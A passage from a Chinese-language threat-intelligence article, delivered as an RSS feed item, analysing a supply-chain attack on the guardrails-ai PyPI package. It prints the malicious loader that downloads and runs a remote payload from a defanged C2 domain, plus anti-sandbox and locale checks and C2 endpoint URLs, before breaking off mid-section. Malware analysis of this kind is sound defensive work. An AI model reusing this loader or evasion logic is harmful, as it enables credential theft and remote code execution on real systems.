<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>腾讯安全威胁情报中心</title>
    <link>https://wechat2rss.xlab.app/feed/034265b14906a59ef7cf1fcbd56699b54a696094.xml</link>
    <description>威胁情报中心（TIX）是一个涵盖全球多维数据的情报分析、威胁预警分析平台。依托顶尖安全专家团队支撑，帮助安全分析人员快速、准确对可疑事件进行预警、溯源分析。&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (腾讯安全威胁情报中心)</managingEditor>
    <pubDate>Tue, 12 May 2026 20:18:36 +0800</pubDate>
    <lastBuildDate>Tue, 12 May 2026 20:18:36 +0800</lastBuildDate>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM7iauE8pC7G1spMlz5rjn8Gz0GgyBIeTHBiciadjE3dYaS1Q/0</url>
      <title>腾讯安全威胁情报中心</title>
      <link>https://wechat2rss.xlab.app/feed/034265b14906a59ef7cf1fcbd56699b54a696094.xml</link>
    </image>
    <item>
      <title>链锁裂变｜TeamPCP 供应链攻击劫持 guardrails-ai，七模块凭据收割全景分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511898&amp;idx=1&amp;sn=55cf5a7445b1796c68e2649152e4d592</link>
      <description>2026年5月12日，腾讯安全发现知名LLM框架guardrails-ai遭供应链攻击。黑客植入恶意代码，旨在窃取多云凭据及敏感文件，并进行持久化控制。</description>
      <content:encoded><![CDATA[<p>原创 <span>腾讯安全威胁情报</span> <span>2026-05-12 20:18</span> <span style="display: inline-block;">上海</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=cf2f423c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FjHUbrwW0VwWSZbOzFqfPJTI0agSQzI3VZibnw7er6pgREJCYseibd8b4ib7UOwTpeGUbHZKXCZjF70JRdNo6AWw4jSTa5IQ9V3b90NZiaD8UG3w%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年5月12日，腾讯安全发现知名LLM框架guardrails-ai遭供应链攻击。黑客植入恶意代码，旨在窃取多云凭据及敏感文件，并进行持久化控制。</p>
  <div class="wx-theme" style="color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Roboto, &#34;Helvetica Neue&#34;, Arial, &#34;Noto Sans&#34;, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;overflow-wrap: break-word;font-size: 16px;line-height: 1.6;padding: 20px 16px;"><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="0" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf="">2026 年 5 月 12 日凌晨，腾讯安全威胁情报中心捕获到知名 LLM 防护框架 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">guardrails-ai</span></code><span leaf=""> 的一个异常版本更新。经深度分析，确认为活跃供应链攻击组织 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">TeamPCP</span></strong><span leaf=""> 发起的最新一轮投毒行动。攻击者在合法包入口文件末尾追加 14 行代码，静默下载并执行一枚 23KB 的 Python zipapp 载荷。载荷内含 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">7 个并发凭据收割模块</span></strong><span leaf="">，覆盖 AWS / Azure / GCP / Kubernetes / HashiCorp Vault / 密码管理器及 90 个敏感文件路径，同时具备条件性系统擦除与 systemd 持久化能力。本文沿攻击链逐层剖析其技术细节。</span></p></blockquote><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="4" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">一、概述</span></h2><p data-line="6" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">guardrails-ai</span></code><span leaf=""> 是一个拥有 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">6.8k GitHub Stars</span></strong><span leaf="">、</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">600+ Forks</span></strong><span leaf=""> 的知名开源项目（Apache-2.0），月 PyPI 下载量约 25 万次，日均下载约 1.2 万次（pypistats.org 数据）。该库为 LLM 应用提供输入/输出验证框架，能够检测幻觉、策略违规和数据泄漏，是当前 AI 应用生产部署中最常用的防护组件之一。官方安装指令为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pip install guardrails-ai</span></code><span leaf="">。</span></p><p data-line="8" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">使用范围</span></strong><span leaf="">，guardrails-ai 广泛应用于企业级 LLM 应用的生产环境，典型场景包括：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">LLM 输入/输出结构化验证（结合 Pydantic schema）</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">AI Agent 的安全策略执行（毒性检测、竞品信息过滤、PII 脱敏等）</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">LLM 网关层防护（通过 Guardrails Server 部署为独立服务）</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">多模型统一接口（兼容 OpenAI、Anthropic 及开源模型）</span></p></li></ul><p data-line="14" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">用户群体涵盖 AI 应用开发者、MLOps 工程师、LLM 平台运维团队，部署环境多为 Linux 服务器、Kubernetes 集群和 CI/CD 流水线——恰好是本次恶意载荷的重点攻击目标。</span></p><p data-line="16" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">影响范围</span></strong><span leaf="">，2026-05-12 00:47 UTC，攻击者向 PyPI 发布版本 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">0.10.1</span></strong><span leaf="">——紧随正式 release v0.10.0（2026-04-03）之后的递增版本号。包内 178 个 .py 文件中，</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">仅 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">__init__.py</span></code><span leaf=""> 末尾被追加了 14 行恶意代码</span></strong><span leaf="">，其余 177 个文件均为原始合法代码。以下场景可能受影响：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">使用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pip install --upgrade guardrails-ai</span></code><span leaf=""> 或不锁版本号的 CI/CD pipeline，可能静默拉取到恶意版本</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">恶意版本上传（00:47 UTC）至 PyPI 下架之间的窗口期内，所有新安装或升级操作均存在风险</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">依赖 guardrails-ai 的下游包和内部项目可能通过依赖传递被间接影响</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">恶意载荷仅在 Linux 平台触发，Windows/macOS 用户不受影响</span></p></li></ul><p data-line="22" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">PyPI 在数小时内下架了该包全部版本。我们通过 CDN 预取机制成功找回样本。</span></p><p data-line="24" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">载荷署名 ASCII art 为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">TeamPCP</span></code><span leaf="">，C2 IP 与已知 TeamPCP 基础设施同网段，多项 TTP 高度吻合——这是该组织继 Trivy、KICS、LiteLLM、Telnyx、Xinference、TanStack 之后的</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">又一次高价值目标供应链投毒</span></strong><span leaf="">。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="28" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">二、初始入口：14 行的入口劫持</span></h2><p data-line="30" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">注入位置</span></strong><span leaf="">，</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">guardrails/__init__.py</span></code><span leaf="">，第 35-48 行。</span></p><p data-line="32" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">原文件第 1-33 行为标准的模块导出代码（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">from guardrails.guard import Guard</span></code><span leaf=""> 等），攻击者在其后追加：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> sys.platform.startswith(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;linux&#34;</span></span><span leaf="">):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    URL = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;hxxps[:]//git-tanstack[.]com/transformers.pyz&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    PATH = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;/tmp/transformers.pyz&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    req = urllib.request.Request(URL, headers={</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#39;User-Agent&#39;</span></span><span leaf="">: </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#39;Mozilla/5.0&#39;</span></span><span leaf="">})</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">with</span></span><span leaf=""> urllib.request.urlopen(req) </span><span style="color: rgb(0, 72, 171);"><span leaf="">as</span></span><span leaf=""> response, </span><span style="color: rgb(0, 72, 171);"><span leaf="">open</span></span><span leaf="">(PATH, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#39;wb&#39;</span></span><span leaf="">) </span><span style="color: rgb(0, 72, 171);"><span leaf="">as</span></span><span leaf=""> out_file:</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        out_file.write(response.read())</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    subprocess.run([</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;python3&#34;</span></span><span leaf="">, PATH])</span></p></code></pre></div><p data-line="48" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">行为极为直白，无混淆：</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">import</span></span><span leaf=""> guardrails（任何方式）</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(76, 129, 201);"><span leaf="">↓</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">检查 sys.platform </span><span style="color: rgb(76, 129, 201);"><span leaf="">==</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;linux&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(76, 129, 201);"><span leaf="">↓</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">从 git</span><span style="color: rgb(76, 129, 201);"><span leaf="">-</span></span><span leaf="">tanstack[.]com 下载 transformers.pyz </span><span style="color: rgb(76, 129, 201);"><span leaf="">→</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">/tmp/</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(76, 129, 201);"><span leaf="">↓</span></span><span leaf=""> (</span><span style="color: rgb(0, 72, 171);"><span leaf="">User</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">-</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">Agent</span></span><span leaf=""> 伪造为 </span><span style="color: rgb(0, 72, 171);"><span leaf="">Mozilla</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">/</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">5.0</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">subprocess.run([</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;python3&#34;</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;/tmp/transformers.pyz&#34;</span></span><span leaf="">])</span></p></code></pre></p><p data-line="60" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">C2 域名 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">git-tanstack[.]com</span></code><span leaf=""> 仿冒了 TanStack 开源项目——就在</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">前一天</span></strong><span leaf="">（2026-05-11），TeamPCP 刚刚对 TanStack 的 42 个 npm 包发动了大规模供应链攻击（CVE-2026-45321）。文件名 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">transformers.pyz</span></code><span leaf=""> 则仿冒 HuggingFace 的 Transformers 库。</span></p><p data-line="62" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">对包内全部 178 个 .py 文件排查确认，恶意注入点唯一。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="66" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">三、反沙箱三重门：</span><code style="font-size: 17.28px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.pyz</span></code><span leaf=""> 入口逻辑</span></h2><p data-line="68" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">第二阶段载荷 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">transformers.pyz</span></code><span leaf=""> 是一枚 23KB 的 Python zipapp 归档（SHA256: </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0f35abda...</span></code><span leaf="">），解压后含 18 个文件、16 个 Python 模块。</span></p><p data-line="70" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">__main__.py</span></code><span leaf=""> 实现了三重环境检查，逐层过滤非目标环境：</span></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse: separate;border-spacing: 0px;border-radius: 6px;margin: 1em auto;color: rgb(51, 51, 51);box-shadow: none;border: 1px solid rgb(208, 215, 227);width: 2812.47px;"><thead><tr><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">关卡</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">代码</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">意图</span></p></th></tr></thead><tbody><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">① 平台检查</span></strong></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">if sys.platform not in (&#39;linux&#39;): sys.exit(1)</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">仅攻击 Linux</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">② 语言豁免</span></strong></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">if lang.lower().startswith(&#39;ru&#39;): sys.exit(1)</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">跳过俄语系统</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">③ 沙箱规避</span></strong></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">if os.cpu_count() &lt;= 4: sys.exit(1)</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">排除低配分析沙箱</span></p></td></tr></tbody></table></p><p data-line="78" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">通过检查后，静默安装 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">cryptography</span></code><span leaf=""> 库（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pip install cryptography --break-system-packages</span></code><span leaf="">），然后将 stdout/stderr 重定向到 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">/dev/null</span></code><span leaf="">，运行主控模块 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">entrypoint</span></code><span leaf="">。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="82" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">四、主控中枢：三重冗余回传 + RSA 信封加密</span></h2><p data-line="84" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">entrypoint.py</span></code><span leaf=""> 是整个载荷的指挥中心（161 行），硬编码了 C2 地址和 RSA-4096 公钥。</span></p><h3 data-line="86" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">4.1 C2 通信：伪装 ML 模型服务</span></h3><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">_EARLY_QUARANTINE_URL = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;hxxps[:]//83[.]142.209.194/v1/modelsx&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">_TARGET_URL = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;hxxps[:]//83[.]142.209.194/v1/weights&#34;</span></span></p></code></pre></div><p data-line="93" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">C2 端点刻意伪装为机器学习模型服务 API 路径（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">/v1/models</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 